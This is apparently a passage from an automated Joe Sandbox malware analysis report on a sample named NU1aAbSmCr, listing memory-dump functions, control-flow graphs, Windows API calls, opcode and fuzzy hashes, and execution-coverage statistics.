                                                      • Source File: 00000000.00000002.1365378642.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4f50000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 0628a99eff14a8de704558901610bd485e4e3bd17257a5973302761739cb265f
                                                      • Instruction ID: 2414fb8f240f0e0efdeec3312200d7a3b44272cf87d4abc1ab37e26e1ced9b19
                                                      • Opcode Fuzzy Hash: 0628a99eff14a8de704558901610bd485e4e3bd17257a5973302761739cb265f
                                                      • Instruction Fuzzy Hash: 1A51A0B1D00309DFDB14CF9AD984ADEBBB5BF48310F64812AE919AB220D775A945CF90
                                                      Function 04F51CF4 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1030 4f51cf4-4f51d5e 1031 4f51d60-4f51d66 1030->1031 1032 4f51d69-4f51d70 1030->1032 1031->1032 1033 4f51d72-4f51d78 1032->1033 1034 4f51d7b-4f51db3 1032->1034 1033->1034 1035 4f51dbb-4f51e1a CreateWindowExW 1034->1035 1036 4f51e23-4f51e5b 1035->1036 1037 4f51e1c-4f51e22 1035->1037 1041 4f51e5d-4f51e60 1036->1041 1042 4f51e68 1036->1042 1037->1036 1041->1042 1043 4f51e69 1042->1043 1043->1043
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F51E0A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365378642.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4f50000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 4cec1f26b07ae99d1ade77b20103e6011c7abe81f0db28cd500b784c28fe5c49
                                                      • Instruction ID: 9770cb6cffd473df1dce809437a5778d62281e7a63d1f8577f02ae19bc85fcb8
                                                      • Opcode Fuzzy Hash: 4cec1f26b07ae99d1ade77b20103e6011c7abe81f0db28cd500b784c28fe5c49
                                                      • Instruction Fuzzy Hash: 7B41CFB1D003099FDF14CF9AD984ADEBBB5FF48310F64812AE918AB210D775A946CF90
                                                      Function 04F5155C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1044 4f5155c-4f542fc 1047 4f54302-4f54307 1044->1047 1048 4f543ac-4f543cc call 4f51434 1044->1048 1050 4f54309-4f54340 1047->1050 1051 4f5435a-4f54392 CallWindowProcW 1047->1051 1055 4f543cf-4f543dc 1048->1055 1058 4f54342-4f54348 1050->1058 1059 4f54349-4f54358 1050->1059 1053 4f54394-4f5439a 1051->1053 1054 4f5439b-4f543aa 1051->1054 1053->1054 1054->1055 1058->1059 1059->1055
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F54381
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365378642.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4f50000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: f9d35c5836c71b46391e773c217d808cf2241c553dcde43e04f5a86630546efd
                                                      • Instruction ID: bb152878137e66d75a6f41af4d2235f2ef1cc7809cd07acd040e713ede411954
                                                      • Opcode Fuzzy Hash: f9d35c5836c71b46391e773c217d808cf2241c553dcde43e04f5a86630546efd
                                                      • Instruction Fuzzy Hash: 6B411AB5900305DFDB14CF99C448BAABBF5FF88314F248459E519AB321D775A842CFA1
                                                      Function 00F944B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1061 f944b4-f959d9 CreateActCtxA 1065 f959db-f959e1 1061->1065 1066 f959e2-f95a3c 1061->1066 1065->1066 1073 f95a4b-f95a4f 1066->1073 1074 f95a3e-f95a41 1066->1074 1075 f95a51-f95a5d 1073->1075 1076 f95a60 1073->1076 1074->1073 1075->1076 1078 f95a61 1076->1078 1078->1078
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00F959C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 0d063a56bbf14f18ee18b6169f517cb7353d573584444000fcc8c7a592ab897d
                                                      • Instruction ID: 5f55cd22ce3642a8c54f197c48d8cbe43bbae361e1a238ada973c1a6ef4d91b1
                                                      • Opcode Fuzzy Hash: 0d063a56bbf14f18ee18b6169f517cb7353d573584444000fcc8c7a592ab897d
                                                      • Instruction Fuzzy Hash: 0141D2B1C00718CBEF25CFA9C884B9EBBB5BF48704F20816AD418AB251DB756946DF90
                                                      Function 00F9590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1079 f9590c-f9598c 1081 f9598f-f959d9 CreateActCtxA 1079->1081 1083 f959db-f959e1 1081->1083 1084 f959e2-f95a3c 1081->1084 1083->1084 1091 f95a4b-f95a4f 1084->1091 1092 f95a3e-f95a41 1084->1092 1093 f95a51-f95a5d 1091->1093 1094 f95a60 1091->1094 1092->1091 1093->1094 1096 f95a61 1094->1096 1096->1096
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00F959C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 17b2f4c40f92825d7125ed7d431082ba5bc1432581b391b392db024026706d4f
                                                      • Instruction ID: 9ff1351158adaeb12a3b7773ccde47e182498fd41623079b2fe3ca2f6a63add2
                                                      • Opcode Fuzzy Hash: 17b2f4c40f92825d7125ed7d431082ba5bc1432581b391b392db024026706d4f
                                                      • Instruction Fuzzy Hash: 7F41FFB1C00719CFEF25CFA9C884B9EBBB1BF48704F20816AD418AB251DB756946CF90
                                                      Function 00F95A84 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1097 f95a84-f95b14
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a278a44a61e89cd4b3ecaeceb020686cab0c76f6bc2066fa89f2127e4e8cc769
                                                      • Instruction ID: 768caf9a281a341653e3957f4e8843458dd662745ef29fe9a763a32d6740aa1b
                                                      • Opcode Fuzzy Hash: a278a44a61e89cd4b3ecaeceb020686cab0c76f6bc2066fa89f2127e4e8cc769
                                                      • Instruction Fuzzy Hash: E331BD72C05A48CFFF12CFA8C8857EEBBB0AF55724F10418AC055AB251C779A94AEF51
                                                      Function 00F95910 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1100 f95910-f9598c 1102 f9598f-f959d9 CreateActCtxA 1100->1102 1104 f959db-f959e1 1102->1104 1105 f959e2-f95a3c 1102->1105 1104->1105 1112 f95a4b-f95a4f 1105->1112 1113 f95a3e-f95a41 1105->1113 1114 f95a51-f95a5d 1112->1114 1115 f95a60 1112->1115 1113->1112 1114->1115 1117 f95a61 1115->1117 1117->1117
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00F959C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: e1407b67578299d636c49daf1fec132153ea743b4ede6ea3b45d6b8a23b6a386
                                                      • Instruction ID: 2a39efb15096364e718242b7fcc5993ff5c30556e6a09834bbdbfaf16c4eeefe
                                                      • Opcode Fuzzy Hash: e1407b67578299d636c49daf1fec132153ea743b4ede6ea3b45d6b8a23b6a386
                                                      • Instruction Fuzzy Hash: 3241FFB1C00718CFEF25CFA9C884B8EBBB1BF48704F20816AD419AB251DB756946CF90
                                                      Function 00F9D0B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1118 f9d0b8-f9d61c DuplicateHandle 1120 f9d61e-f9d624 1118->1120 1121 f9d625-f9d642 1118->1121 1120->1121
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F9D54E,?,?,?,?,?), ref: 00F9D60F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: bf77d612120750672ec224ac023a9c439b741715aa7d62bc51de94c9f3e82804
                                                      • Instruction ID: 4b20f16f18310b665374c45b2988cf8f43e60c0568f672371900aad49a75fadf
                                                      • Opcode Fuzzy Hash: bf77d612120750672ec224ac023a9c439b741715aa7d62bc51de94c9f3e82804
                                                      • Instruction Fuzzy Hash: BE2105B59002089FDF10CF9AD484AEEBBF4EB48310F14802AE918A7311D374A954CFA0
                                                      Function 00F9D581 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1124 f9d581-f9d61c DuplicateHandle 1125 f9d61e-f9d624 1124->1125 1126 f9d625-f9d642 1124->1126 1125->1126
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F9D54E,?,?,?,?,?), ref: 00F9D60F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 20fe107790df611e0325de9067d395d0f8ee8c831e50907bd2f58f80bf3bc6bf
                                                      • Instruction ID: decb1f3085185a9e45be3bed3589a3a6d756c9d7c39a405d5eb5e287f54ae86f
                                                      • Opcode Fuzzy Hash: 20fe107790df611e0325de9067d395d0f8ee8c831e50907bd2f58f80bf3bc6bf
                                                      • Instruction Fuzzy Hash: 7221E4B5D002489FDB10CF9AD584AEEBBF4FB48320F14842AE958A7351D379A954CFA1
                                                      Function 06ED0088 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1135 6ed0088-6ed1dfa PostMessageW 1137 6ed1dfc-6ed1e02 1135->1137 1138 6ed1e03-6ed1e17 1135->1138 1137->1138
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ED1DED
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1371935689.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6ed0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: c6b1bdcb3a48371f5ee5fe504722f3f29c084ea41ee58a977facd35f6f4c5435
                                                      • Instruction ID: 6118f7ad723e86dfaa37dc183f619fe467dbb6568a632510e44a7a7c4c138cdf
                                                      • Opcode Fuzzy Hash: c6b1bdcb3a48371f5ee5fe504722f3f29c084ea41ee58a977facd35f6f4c5435
                                                      • Instruction Fuzzy Hash: 6F1103B5804348DFDB60DF9AD845BEEBBF8EB48310F108459E958B7200D375A944CFA5
                                                      Function 00F9B298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1129 f9b298-f9b2d8 1130 f9b2da-f9b2dd 1129->1130 1131 f9b2e0-f9b30b GetModuleHandleW 1129->1131 1130->1131 1132 f9b30d-f9b313 1131->1132 1133 f9b314-f9b328 1131->1133 1132->1133
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00F9B2FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: a1bfa6fc152cfe2ab8dca7a1522cbebb584e41eb99d79d334b9ce3d3526d2151
                                                      • Instruction ID: b6a2cd46762603ea4d866bc0d410edf5f5c51dc53c11ddee3f11e566b3c5adc7
                                                      • Opcode Fuzzy Hash: a1bfa6fc152cfe2ab8dca7a1522cbebb584e41eb99d79d334b9ce3d3526d2151
                                                      • Instruction Fuzzy Hash: 1811E0B5C006498FDB20CF9AD544BDEFBF4EF88724F10842AD859A7210D375A545CFA5
                                                      Function 06ED1D88 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ED1DED
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1371935689.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6ed0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: e6eb48886ca82160392292fe9e45c37a297f6f696a5c990d804d54f365f1d05a
                                                      • Instruction ID: 8ad49cd69f5ca491b2195ed1e4e00fa39107e1c6fe9376a26f2420a4b5d76001
                                                      • Opcode Fuzzy Hash: e6eb48886ca82160392292fe9e45c37a297f6f696a5c990d804d54f365f1d05a
                                                      • Instruction Fuzzy Hash: 991122B58043499FDB20CF99D844BDEFFF8EB48324F20841AE898A7240C375A644CFA5
                                                      Function 00C8D4C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349411800.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c8d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 952f6bd382aa531e9a0ac2617bf204ecaa3d591a9da024565bf2da711d66074f
                                                      • Instruction ID: 33c77b2f889f223ca9b9376aefa69ba22a0d0d86064a9ee670b44b3099dd3e58
                                                      • Opcode Fuzzy Hash: 952f6bd382aa531e9a0ac2617bf204ecaa3d591a9da024565bf2da711d66074f
                                                      • Instruction Fuzzy Hash: AB21F5B1504240DFDB15EF14D9C0F26BF65FB9831CF24C56AE80A0B296C336D956CBA6
                                                      Function 00C8D3D8 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349411800.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c8d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c2e565c4a4647934c3ffc44488a548fafdbbeba4e91af3a3c90a576aa06e122
                                                      • Instruction ID: f29356fc7c6cdff12dafd3a27061cc84a09258234e2ea5aebedd225be3509ab1
                                                      • Opcode Fuzzy Hash: 3c2e565c4a4647934c3ffc44488a548fafdbbeba4e91af3a3c90a576aa06e122
                                                      • Instruction Fuzzy Hash: 7421F871504304DFDB05EF50D9C0B16BB65FBD8328F24C56DE90A0B296C376E856CBA6
                                                      Function 00C9D01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349467277.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c9d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 89444a197663f1b44d5602254eb03416fc9ccae902453e589f7820aaff221e00
                                                      • Instruction ID: 51c75287a8fb5607aedb7b6618d67efa89044447bd973c8f894fd379592c176b
                                                      • Opcode Fuzzy Hash: 89444a197663f1b44d5602254eb03416fc9ccae902453e589f7820aaff221e00
                                                      • Instruction Fuzzy Hash: 8C21FF71604300DFDF14DF24D9C8B26BBA5FB88314F20C5ADE84A5B296C33AD857CA62
                                                      Function 00C9D005 Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349467277.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c9d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ce7a1da7fd7d3b03bced9cb5dfa5739f40deb0c49f5ccce317cbfc51b0b0d9c
                                                      • Instruction ID: 85b4d19cee812aaeb4799d92ef30a05dcd481ad2d27905eef7c9564dcd7bd05b
                                                      • Opcode Fuzzy Hash: 3ce7a1da7fd7d3b03bced9cb5dfa5739f40deb0c49f5ccce317cbfc51b0b0d9c
                                                      • Instruction Fuzzy Hash: 70219F755093C08FCB02CF24D994715BF71EB46314F28C5EAD84A8F6A7C33A980ACB62
                                                      Function 00C8D3D3 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349411800.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c8d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                      • Instruction ID: 2868cfd2b605e17406769c0e1edb2ac92af2c295f4bc60c021cc0f76dfb565b7
                                                      • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                      • Instruction Fuzzy Hash: CB11D376504240DFCB15DF10D5C4B16BF71FB94328F24C6A9D84A0B656C33AE95ACBA1
                                                      Function 00C8D4BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349411800.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c8d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                      • Instruction ID: bd81352d74047f46a1f8324bfc39700c69c6973d03948da1640b2a303cd3037b
                                                      • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                      • Instruction Fuzzy Hash: 1111E6B6504280DFCB15DF10D5C4B16BF71FB94318F24C6AAD84A0B656C336D95ACBA1
                                                      Function 00C8D731 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349411800.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c8d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6b095c7a2106bea691c480f2ad2d83831f8f8f8b66937372e0e38597e96cc5e7
                                                      • Instruction ID: 99c331b66c17d1d86f70f4c1565aa535ca4fa004aa05a7e25bb07b785eb064b5
                                                      • Opcode Fuzzy Hash: 6b095c7a2106bea691c480f2ad2d83831f8f8f8b66937372e0e38597e96cc5e7
                                                      • Instruction Fuzzy Hash: BA01DB310083449BE724AB66CD84B66FBD8DF41328F14C469ED5A4E1C6D7799D40C776
                                                      Function 00C8D730 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349411800.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c8d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7686634df213eb26775efa7fdefd30e2166c07ce7b0593dc2ee900ec42761bb2
                                                      • Instruction ID: 258e99f8da1c0f98b611f195f393d6f2af5c7fe27516e40116fd0bb98442f9c9
                                                      • Opcode Fuzzy Hash: 7686634df213eb26775efa7fdefd30e2166c07ce7b0593dc2ee900ec42761bb2
                                                      • Instruction Fuzzy Hash: FEF0C231004344AEE7109A16C884B62FFD8EB90338F18C45AED594E286C3799C44CB71

                                                      Non-executed Functions

                                                      Function 06ED3528 Relevance: .4, Instructions: 356COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1371935689.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6ed0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd9d43cf9d350e2290026c6dfa1e37a7fe5a1fb069082bd31d2bdda41001816f
                                                      • Instruction ID: c5d11bc1adc8f003db27362c4e184b74142282497b9acb550599e47c35cc21db
                                                      • Opcode Fuzzy Hash: fd9d43cf9d350e2290026c6dfa1e37a7fe5a1fb069082bd31d2bdda41001816f
                                                      • Instruction Fuzzy Hash: 74D1AC70B007009FEBA5DB75C950BAEB7E6AF8A700F14846DD116CB291DF35E902CB92
                                                      Function 04F50040 Relevance: .3, Instructions: 315COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365378642.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4f50000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 915cc0e65f080ec2bd480e73d73027b7e1728099a9e94646b5a7e09a69c42168
                                                      • Instruction ID: 4fcde1c9d9786f959e2e4d2b6262c4989030922e49044691cc75cb2e8acc133b
                                                      • Opcode Fuzzy Hash: 915cc0e65f080ec2bd480e73d73027b7e1728099a9e94646b5a7e09a69c42168
                                                      • Instruction Fuzzy Hash: B11294B0C917458BE714CF65E8CC1893BB1BB45318FD04A0AD2612B2E9DFB8956BDF44
                                                      Function 00F9DE4C Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fb5c6aaee2508092b2a6d2496ba57a1c9319de35f55d9629c43e9c71d9855c7e
                                                      • Instruction ID: a261b641a12c7bff9246ba9904bb9c4dd404a925eb713ff98878e6be2d26d152
                                                      • Opcode Fuzzy Hash: fb5c6aaee2508092b2a6d2496ba57a1c9319de35f55d9629c43e9c71d9855c7e
                                                      • Instruction Fuzzy Hash: 48A18C32E002098FDF05DFB5C98059EB7B2FF85310B25857AE906AB265DB35ED1ADB40
                                                      Function 04F50006 Relevance: .2, Instructions: 248COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365378642.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4f50000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d73590d80dceca73fabfd2fabb93eb35cda7f88552ab2ce679c6d8dfacf978af
                                                      • Instruction ID: de43d6f1cdac22a50e381f3d74d82d922ca193cc49dac46b57b9d3963e8c8bdc
                                                      • Opcode Fuzzy Hash: d73590d80dceca73fabfd2fabb93eb35cda7f88552ab2ce679c6d8dfacf978af
                                                      • Instruction Fuzzy Hash: 3FC105B0C917458BEB10CF29E8CC1893BB1BB85324F904A0AD1616B2E9DFB4946BDF54
                                                      Function 00F94B64 Relevance: .2, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c0e3c7a03f0646a760503778630c3c9c2adf62aa0d63c651768640f7573e9f3
                                                      • Instruction ID: 09d784c378b7854d7a17b64faee9c0fd3250f111f99061a01ff91a88c9e5082f
                                                      • Opcode Fuzzy Hash: 1c0e3c7a03f0646a760503778630c3c9c2adf62aa0d63c651768640f7573e9f3
                                                      • Instruction Fuzzy Hash: B561285BA9591487FF5404AB5C657D623C1E3BB32CF109709F22C9A3D2F854F8C3925A

                                                      Execution Graph

                                                      Execution Coverage:1.2%
                                                      Dynamic/Decrypted Code Coverage:4.6%
                                                      Signature Coverage:7.9%
                                                      Total number of Nodes:152
                                                      Total number of Limit Nodes:12
